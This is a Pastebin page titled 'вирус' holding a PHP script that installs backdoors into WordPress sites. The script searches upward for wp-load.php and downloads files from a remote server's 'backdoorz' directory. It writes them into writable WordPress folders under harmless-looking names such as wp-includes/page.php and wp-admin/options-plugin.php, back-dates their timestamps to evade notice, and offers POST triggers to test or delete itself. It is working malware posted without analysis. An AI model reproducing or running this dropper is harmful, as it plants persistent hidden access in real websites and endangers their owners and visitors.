Ledger Nano X - The secure hardware wallet
SHARE
TWEET

вирус

a guest Apr 9th, 2012 222 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. @ini_set('allow_url_fopen',          1);
  3. @ini_set('default_socket_timeout', 120);
  4.  
  5. unlink($dir.'/wp-feed.php');
  6.  
  7. if (isset($_POST['t']))
  8.         die ("it "."works");
  9.  
  10. if (isset($_POST['d']))
  11.         unlink (__FILE__);
  12.  
  13.         $dir = getcwd ();
  14.         $files = glob ($dir."/wp-load.php");
  15.         while (empty ($files) && "/" !== $dir && '' !== $dir) {
  16.                 $dir = dirname ($dir);
  17.                 $files = glob ($dir."/wp-load.php");
  18.         }
  19.         if(empty($files)):die();endif;
  20.         $time = filemtime($files[0]);
  21.  
  22. function get_contentz($url) {
  23.         if(function_exists('file_get_contents') && ini_get('allow_url_fopen') == 1 ){
  24.                 if ($data = @file_get_contents($url))
  25.                         return $data;
  26.         }elseif(function_exists('curl_init') ){
  27.                 if ($ch = @curl_init()) {
  28.  
  29.                         @curl_setopt($ch, CURLOPT_URL,              $url);
  30.                         @curl_setopt($ch, CURLOPT_HEADER,           false);
  31.                         @curl_setopt($ch, CURLOPT_RETURNTRANSFER,   true);
  32.                         @curl_setopt($ch, CURLOPT_CONNECTTIMEOUT,   60);
  33.              
  34.                         if ($data = @curl_exec($ch)) {
  35.                             return $data;
  36.                         }
  37.                
  38.                         @curl_close($ch);
  39.                 }
  40.         }else{
  41.           $url_parts = @parse_url( $url );
  42.           $documentpath = $url_parts["path"];
  43.           $documentpath .= "?" . $url_parts["query"];
  44.           $host = $url_parts["host"];
  45.           $port = $url_parts["port"];
  46.           $fp = fsockopen( $host, 80, $errno, $errstr, 5 );
  47.           if(!$fp) return '';
  48.           fwrite ($fp, "GET ".$documentpath." HTTP/1.0\r\nHost: $host\r\n\r\n");
  49.           while(!feof($fp)) $fcon.=fgets($fp, 10024);
  50.           fclose($fp);
  51.         return $fcon;
  52.         }
  53. }
  54.  
  55.         function file_put_contentz($file,$data){               
  56.                 $f=@fopen($file, 'w');
  57.                 return @fwrite($f, $data);
  58.                 @fclose($f);
  59.         }
  60.  
  61.  
  62.  
  63. function is__writable($path) {
  64.  
  65.     if ($path{strlen($path)-1}=='/') // recursively return a temporary file path
  66.         return is__writable($path.uniqid(mt_rand()).'.tmp');
  67.     else if (is_dir($path))
  68.         return is__writable($path.'/'.uniqid(mt_rand()).'.tmp');
  69.     // check tmp file for read/write capabilities
  70.     $rm = file_exists($path);
  71.     $f = @fopen($path, 'a');
  72.     if ($f===false)
  73.         return false;
  74.     fclose($f);
  75.     if (!$rm)
  76.         unlink($path);
  77.     return true;
  78. }
  79.  
  80.  
  81.  
  82. if(is__writable($dir."/wp-includes/")):
  83.         file_put_contentz($dir.'/wp-includes/page.php', get_contentz('http://67.211.195.81/backdoorz/page.php'));
  84.         touch($dir.'/wp-includes/page.php', $time);
  85.         die(";;/wp-includes/page.php;;true_upload");
  86. endif;
  87.  
  88. if(is__writable($dir."/wp-content/themes/".get_settings('template')."/")){
  89.         file_put_contentz($dir.'/wp-content/themes/'.get_settings('template').'/timthumb.php', get_contentz('http://67.211.195.81/backdoorz/timthumb.php'));
  90.         touch($dir.'/wp-content/themes/'.get_settings('template').'/timthumb.php', $time);
  91.         die(";;/wp-content/themes/".get_settings('template')."/timthumb.php;;true_upload");
  92. }
  93.  
  94. if(is__writable($dir."/wp-admin/")):
  95.         file_put_contentz($dir.'/wp-admin/options-plugin.php', get_contentz('http://67.211.195.81/backdoorz/wp-plugin.php'));
  96.         touch($dir.'/wp-admin/options-plugin.php', $time);
  97.         die(";;/wp-admin/options-plugin.php;;true_upload");
  98. endif;
  99.  
  100. if(is__writable($dir."/")):
  101.         file_put_contentz($dir.'/wp-plugin.php', get_contentz('http://67.211.195.81/backdoorz/wp-plugin.php'));
  102.         touch($dir.'/wp-plugin.php', $time);
  103.         die(";;/wp-plugin.php;;true_upload");
  104. endif;
  105.  
  106. if(is__writable($dir."/wp-content/themes/")){
  107.         file_put_contentz($dir.'/wp-content/themes/theme.php', get_contentz('http://67.211.195.81/backdoorz/page.php'));
  108.         touch($dir.'/wp-content/themes/theme.php', $time);
  109.         die(";;/wp-content/themes/theme.php;;true_upload");
  110. }
  111.  
  112. if(is__writable($dir."/wp-content/uploads/")){
  113.         file_put_contentz($dir.'/wp-content/uploads/timthumb.php', get_contentz('http://67.211.195.81/backdoorz/timthumb.php'));
  114.         touch($dir.'/wp-content/uploads/timthumb.php', $time);
  115.         die(";;/wp-content/uploads/timthumb.php;;true_upload");
  116. }else{
  117.         die(";;0;;false_upload");
  118. }
  119.  
  120. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top